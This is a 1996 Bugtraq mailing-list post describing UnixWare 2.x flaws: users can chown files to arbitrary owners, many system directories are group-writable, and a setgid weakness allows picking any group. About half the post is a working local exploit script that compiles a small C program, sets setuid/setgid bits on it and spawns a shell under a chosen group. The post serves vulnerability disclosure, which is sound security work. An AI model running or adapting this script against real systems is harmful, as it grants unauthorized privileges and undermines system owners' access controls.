[3271] in bugtraq
More on UnixWare 2.x vulnerability
daemon@ATHENA.MIT.EDU (Todd Vierling)
Sat Aug 24 15:20:16 1996
Date: Sat, 24 Aug 1996 14:48:48 -0400
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Todd Vierling <tv@pobox.com>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
I've found out a more about UnixWare 2. It seems the system (and I don't
know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer)
allows chown'ing a file *to* any arbitrary user and group. Hm, lessee.
Create a file that uses up all the available space in /tmp, then chown it
root:bin. Okay, now someone else tell me who created that file.
Anyway, back to the setgid problem. I've found an exploit script (it's not
all that difficult to do by hand, anyway...) on an FTP site pointed to by
the floating post about this bug. It follows. While browsing the default
installation of UnixWare, it seems a couple *hundred* directories, including
particularly /usr/bin, /sbin, and /usr/sbin, are writable by group. This is
bad, very bad.
=====
#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup <groupid>)
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
int main(void) { setgid(getegid()); execl("/bin/sh", "-", 0); }
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$
/tmp/.$$
rm -f /tmp/.$$
=====
== Todd Vierling (Personal tv@pobox.com; Business tv@iag.net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==
